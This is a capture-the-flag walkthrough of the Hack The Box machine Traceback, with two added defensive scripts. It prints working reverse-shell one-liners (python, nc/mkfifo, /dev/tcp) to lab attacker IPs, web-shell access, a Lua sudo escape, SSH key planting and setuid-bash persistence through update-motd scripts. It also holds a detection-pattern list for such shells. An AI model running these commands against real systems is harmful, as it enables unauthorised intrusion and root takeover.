HTB box: Traceback

This article is intended only for technical exchange, learning and research. Using the techniques in it for illegal purposes or to cause damage is strictly prohibited; the author bears no responsibility for any consequences.

The box is a retired machine run with the author's VIP subscription; its IP address is 10.10.10.181.

This time https://github.com/Tib3rius/Traceback is used for an automated, all-round scan.

Information gathering and enumeration
https://github.com/codingo/Reconnoitre is a similar tool to autorecon.
autorecon 10.10.10.181 -o ./Traceback-autorecon

masscan -p1-65535 10.10.10.181 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.181

Only two ports are open, 22 and 80. Browsing to port 80 shows a page saying the target box has been hacked; looking at the response captured in Burp reveals the following:
Some of the best web shells that you might need 
Searching Google for that string turns up a GitHub link:
https://github.com/TheBinitGhimire/Web-Shells
The repository lists the following web shells:
alfav3-encoded.php
alfav4.1-decoded.php
alfav4.1-encoded.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
TwemlowsWebShell.php
wso2.8.5.php
Use these file names as a wordlist for directory brute forcing:
gobuster dir -u http://10.10.10.181 -w webshellwords.txt

This found the web shell. According to the GitHub page the username and password are both admin. After logging in and browsing the features, the command-execution function was used to get a reverse shell. Checking what the environment supports: there is no python2, but python3 is present; nc is also present, but its -e option did not work, so python3 is used for the reverse shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &

After getting the reverse shell, the current user is webadmin. Looking in its home directory, there is a note:
webadmin@traceback:/home$ cat /home/webadmin/note.txt
cat /home/webadmin/note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

So the hint is to run a Lua script. Check the bash history:

webadmin@traceback:/home$ history
history
    1  ls -la
    2  sudo -l
    3  nano privesc.lua
    4  sudo -u sysadmin /home/sysadmin/luvit privesc.lua
    5  rm privesc.lua
    6  logout
    7  id
    8  pwd
    9  id
   10  pw
   11  dls
   12  ls
   13  ls /home
   14  cd /home
   15  ls
   16  ls -la /home/webadmin/
   17  cat /home/webadmin/note.txt
   18  history
webadmin@traceback:/home$
That makes it clear: write a Lua script and pivot to the user sysadmin.
https://gtfobins.github.io/gtfobins/lua/

echo "require('os');" > cntf.lua
echo "os.execute('/bin/bash');" >> cntf.lua

Create the file above in /tmp, then run it with sudo to move laterally:
sudo -u sysadmin /home/sysadmin/luvit cntf.lua

This gives a shell as sysadmin, but it is not pretty; bash -i gives a prompt with user and hostname. For a more comfortable working environment, write a public key into authorized_keys and log in over SSH with the private key.

echo "ssh-rsa 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 kali@kali" >> /home/sysadmin/.ssh/authorized_keys

Now for root privilege escalation. Check what processes are running.

Use pspy to monitor process activity:
https://github.com/DominicBreuker/pspy

Process monitoring reveals the following suspicious behaviour: a scheduled task runs this backup-copy command every minute as root, overwriting every file under /etc/update-motd.d/.

2021/04/28 19:57:11 CMD: UID=0    PID=1      | /sbin/init noprompt
2021/04/28 19:57:31 CMD: UID=0    PID=2684   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
2021/04/28 19:58:01 CMD: UID=0    PID=2689   | sleep 30
2021/04/28 19:58:01 CMD: UID=0    PID=2688   | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2021/04/28 19:58:01 CMD: UID=0    PID=2687   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2021/04/28 19:58:01 CMD: UID=0    PID=2686   | /usr/sbin/CRON -f
2021/04/28 19:58:01 CMD: UID=0    PID=2685   | /usr/sbin/CRON -f
2021/04/28 19:58:01 CMD: UID=???  PID=2690   | ???
2021/04/28 19:58:31 CMD: UID=0    PID=2691   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
2021/04/28 19:59:01 CMD: UID=0    PID=2696   | sleep 30
2021/04/28 19:59:01 CMD: UID=0    PID=2695   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2021/04/28 19:59:01 CMD: UID=???  PID=2693   | ???
2021/04/28 19:59:01 CMD: UID=0    PID=2692   | /usr/sbin/CRON -f
2021/04/28 19:59:31 CMD: UID=0    PID=2698   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
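An added, defender-side example that is not from the write-up: a small parser for pspy lines like the ones above that picks out root commands copying into login-script directories and measures how often they recur, so a cron-driven overwrite stands out. The sample lines are constructed from the output above, and the WATCH_DIRS list is an assumption.

```python
import re
from datetime import datetime

# Matches pspy "CMD:" lines such as
#   2021/04/28 19:58:01 CMD: UID=0    PID=2688   | /bin/sh -c /bin/cp ...
PSPY_RE = re.compile(r"^(\S+ \S+) CMD: UID=(\S+)\s+PID=(\S+)\s+\| (.*)$")

# Assumption: directories whose scripts root runs at login or on a schedule.
# A root job that keeps rewriting them from a hidden backup is the Traceback pattern.
WATCH_DIRS = ("/etc/update-motd.d/", "/etc/profile.d/", "/etc/cron.d/")

def parse_pspy(text):
    """Yield (timestamp, uid, cmd) for every well-formed CMD line; skip the rest."""
    for line in text.splitlines():
        m = PSPY_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y/%m/%d %H:%M:%S")
            yield ts, m.group(2), m.group(4)

def find_root_copies(text):
    """Group root 'cp ... <watched dir>' commands and measure their cadence.

    Returns {cmd: {"source": first copied path, "count": n, "period": seconds}},
    where period is the gap between the last two sightings (None if seen once)."""
    seen = {}
    for ts, uid, cmd in parse_pspy(text):
        if uid != "0" or "cp " not in cmd:
            continue
        if not any(cmd.rstrip().endswith(d) for d in WATCH_DIRS):
            continue
        args = cmd.split("cp ", 1)[1].split()          # arguments after the cp
        entry = seen.setdefault(cmd, {"source": args[0], "count": 0,
                                      "period": None, "last": None})
        if entry["last"] is not None:
            entry["period"] = int((ts - entry["last"]).total_seconds())
        entry["last"] = ts
        entry["count"] += 1
    return {c: {k: v for k, v in e.items() if k != "last"} for c, e in seen.items()}

# Constructed sample: a few lines taken from the pspy output in this write-up.
SAMPLE = """\
2021/04/28 19:57:11 CMD: UID=0    PID=1      | /sbin/init noprompt
2021/04/28 19:57:31 CMD: UID=0    PID=2684   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /etc/update-motd.d/
2021/04/28 19:58:01 CMD: UID=0    PID=2689   | sleep 30
2021/04/28 19:58:01 CMD: UID=0    PID=2687   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2021/04/28 19:58:01 CMD: UID=???  PID=2690   | ???
2021/04/28 19:58:31 CMD: UID=0    PID=2691   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /etc/update-motd.d/
2021/04/28 19:59:01 CMD: UID=0    PID=2695   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2021/04/28 19:59:31 CMD: UID=0    PID=2698   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /etc/update-motd.d/
"""

if __name__ == "__main__":
    for cmd, info in find_root_copies(SAMPLE).items():
        print(f"every {info['period']}s x{info['count']} from {info['source']}: {cmd}")
```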

Based on this, the privilege escalation is to plant a payload in the scripts under /etc/update-motd.d, which run as root, and trigger them to get a reverse shell. Relevant reading:

https://manpages.ubuntu.com/manpages/trusty/man5/update-motd.5.html
https://linuxconfig.org/how-to-change-welcome-message-motd-on-ubuntu-18-04-server

The various reverse-shell approaches are as follows:

Method 1
https://inth3wild.medium.com/traceback-hack-the-box-writeup-bbd44187feef

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.2",8833))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])


Method 2
echo "mkfifo /tmp/p; nc 10.10.14.2 8833 0</tmp/p | /bin/sh > /tmp/p 2>&1; rm /tmp/p" >> /etc/update-motd.d/00-header
After running the above, quickly run ssh 10.10.10.181 -l sysadmin to trigger the script.
Upgrade to a tty shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Example
sysadmin@traceback:/etc/update-motd.d$ export shell="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.110 4444 >/tmp/f"
sysadmin@traceback:/etc/update-motd.d$ echo $shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.110 4444 >/tmp/f
sysadmin@traceback:/etc/update-motd.d$ echo $shell >> 00-header
sysadmin@traceback:/etc/update-motd.d$ 

Method 3
Upload your own nc build that supports the -e option to the target and use that; see: https://dalemazza.github.io/htb/2020/08/26/HTB-Traceback-Write-up.html

Method 4
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.7/443 0>&1"' >> 00-header

Method 5
https://flast101.github.io/HTB-writeups/traceback/

Method 6
echo 'chmod u+s /bin/bash' >> 00-header 

Method 7
echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.16.125 1234 >/tmp/p' > /etc/update-motd.d/00-header
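An added example, not part of the original post or of the linked write-ups: an audit a defender can run against /etc/update-motd.d to catch the two conditions every method above depends on, scripts that a non-root user can write to, and scripts already carrying shell-injection markers like the lines appended to 00-header. The demo directory and the regex list are constructed assumptions.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Assumed markers: strings with no business in a MOTD script; they match the
# lines this write-up appends to 00-header (reverse shells, fifo pipes, setuid bash).
SUSPICIOUS = [
    (r"/dev/tcp/", "bash network redirection"),
    (r"\b(nc|ncat|netcat)\b", "netcat invocation"),
    (r"mkfifo|mknod \S+ p\b", "named pipe creation"),
    (r"chmod\s+\S*\+s\b", "setuid bit change"),
    (r"socket\.socket|pty\.spawn", "python shell helper"),
]

def audit_motd_dir(path, root_uid=0):
    """Return (file, finding) pairs for scripts a non-root user could tamper
    with (wrong owner, group/other writable) or that already look injected."""
    findings = []
    for f in sorted(Path(path).iterdir()):
        if not f.is_file():
            continue
        st = f.stat()
        if st.st_uid != root_uid:
            findings.append((f.name, f"owned by uid {st.st_uid}, not root"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            mode = stat.S_IMODE(st.st_mode)
            findings.append((f.name, f"writable by group/other (mode {mode:04o})"))
        text = f.read_text(errors="replace")
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, text):
                findings.append((f.name, why))
    return findings

def demo():
    """Constructed sample: one clean script and one tampered script in a
    throwaway directory. On a real host call audit_motd_dir('/etc/update-motd.d')."""
    d = Path(tempfile.mkdtemp())
    clean = d / "10-help-text"
    clean.write_text("#!/bin/sh\nprintf '\\n'\n")
    clean.chmod(0o755)
    bad = d / "00-header"
    bad.write_text("#!/bin/sh\n"
                   "bash -c \"bash -i >& /dev/tcp/10.10.14.7/443 0>&1\"\n"
                   "chmod u+s /bin/bash\n")
    bad.chmod(0o664)   # group-writable: what lets a non-root append succeed
    return audit_motd_dir(d, root_uid=os.getuid())
```

Running demo() reports only 00-header: its group-writable mode, the /dev/tcp reverse shell and the setuid change.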

A confused life needs constant effort before the blurry ambitions in the distance come into view!
Original post: https://www.cnblogs.com/autopwn/p/14718105.html